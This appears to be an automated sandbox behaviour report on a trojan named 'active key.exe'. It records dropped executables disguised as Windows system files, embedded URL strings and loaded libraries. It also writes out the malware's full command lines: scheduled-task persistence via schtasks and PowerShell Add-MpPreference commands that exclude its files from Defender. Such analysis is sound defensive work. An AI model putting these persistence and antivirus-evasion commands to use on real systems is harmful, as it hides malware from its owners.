                    Source: active key.exeString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
                    Source: active key.exeString found in binary or memory: http://pki-ocsp.symauth.com0
                    Source: powershell.exe, 0000001C.00000002.2419074977.0000015C39898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D4A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226583E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABCF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200617F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: ntoskrnl2.exe, 00000005.00000002.2301243668.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2419074977.0000015C39671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226581C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200615D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000001C.00000002.2419074977.0000015C39898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D4A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226583E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABCF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200617F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000001C.00000002.3723545996.0000015C51A00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3653818428.000002267029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                    Source: powershell.exe, 0000001C.00000002.3742689311.0000015C51A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                    Source: powershell.exe, 00000022.00000002.3806662276.00000160C3F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 0000001C.00000002.2419074977.0000015C39671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226581C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200615D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: active key.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                    Source: powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: active key.exe, 00000000.00000002.2261569958.000002CBC844C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/
                    Source: active key.exe, 00000000.00000003.2258183311.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp, active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/ace
                    Source: active key.exe, 00000000.00000003.2258183311.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp, active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/pacec
                    Source: powershell.exe, 0000001C.00000002.3479314878.0000015C496E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.3519140010.00000160BBB44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknown HTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.6:49727 version: TLS 1.2

                    System Summary

                    Source: active key.exe Static PE information: .vmp0 and .vmp1 section names
                    Source: C:\Users\user\Desktop\active key.exe File created: C:\Windows\System32\ntoskrnl2.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Windows\System32\33a22f3fbfeb15
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Windows\en-GB\c5cac97cf6c584
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Windows\tracing\fontdrvhost.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Windows\tracing\5b884080fd4f94
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD342F6FFA37_2_00007FFD342F6FFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD343C660537_2_00007FFD343C6605
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD343C734237_2_00007FFD343C7342
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD343C0D5937_2_00007FFD343C0D59
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD343C30E737_2_00007FFD343C30E7
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD342F604D37_2_00007FFD342F604D
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 48_2_00007FFD3430095648_2_00007FFD34300956
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeCode function: 49_2_00007FFD34320BAC49_2_00007FFD34320BAC
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeCode function: 49_2_00007FFD34320D8F49_2_00007FFD34320D8F
                    Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\DnHERPdP.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                    Source: aAtQiRdB.log.5.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: mlzPodne.log.5.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: UZXJUHSP.log.5.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: DnHERPdP.log.46.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: ZHsakaRB.log.46.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: hCHhiobl.log.46.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: ntoskrnl2.exe.0.dr Static PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: XUkPLaESKIkbWXdxlvmVntDv.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: XUkPLaESKIkbWXdxlvmVntDv.exe0.5.dr Static PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: fontdrvhost.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: explorer.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: backgroundTaskHost.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: aAtQiRdB.log.5.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: mlzPodne.log.5.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: UZXJUHSP.log.5.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: DnHERPdP.log.46.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: ZHsakaRB.log.46.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: hCHhiobl.log.46.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: classification engine Classification label: mal100.troj.evad.winEXE@59/50@2/3
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Users\user\Desktop\aAtQiRdB.log
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1596:120:WilError_03
                    Source: C:\Windows\System32\ntoskrnl2.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DkfDkSKDFkSDFKFDSgdfgk
                    Source: C:\Windows\System32\ntoskrnl2.exe File created: C:\Users\user\AppData\Local\Temp\po0Y962PsX
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat"
                    Source: unknown Process created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                    Source: unknown Process created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                    Source: C:\Windows\System32\ntoskrnl2.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\active key.exe File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\active key.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: active key.exe ReversingLabs: Detection: 68%
                    Source: active key.exe Virustotal: Detection: 67%
                    Source: active key.exe String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectory
                    Source: unknown Process created: C:\Users\user\Desktop\active key.exe "C:\Users\user\Desktop\active key.exe"
                    Source: C:\Users\user\Desktop\active key.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\active key.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c mode con cols=55 lines=15
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode con cols=55 lines=15
                    Source: C:\Users\user\Desktop\active key.exe Process created: C:\Windows\System32\ntoskrnl2.exe "C:\Windows\System32\ntoskrnl2.exe"
                    Source: C:\Users\user\Desktop\active key.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "md5"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "certutil"
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 8 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /f
                    Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDv" /sc ONLOGON /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 9 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f
                    Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 9 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /f
                    Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ntoskrnl2" /sc ONLOGON /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 5 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\fontdrvhost.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\backgroundTaskHost.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\ntoskrnl2.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown Process created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                    Source: unknown Process created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown Process created: C:\Windows\System32\ntoskrnl2.exe C:\Windows\System32\ntoskrnl2.exe
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                    Source: unknown Process created: C:\Windows\System32\ntoskrnl2.exe C:\Windows\System32\ntoskrnl2.exe
                    Source: unknown Process created: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                    Source: unknown Process created: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                    Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
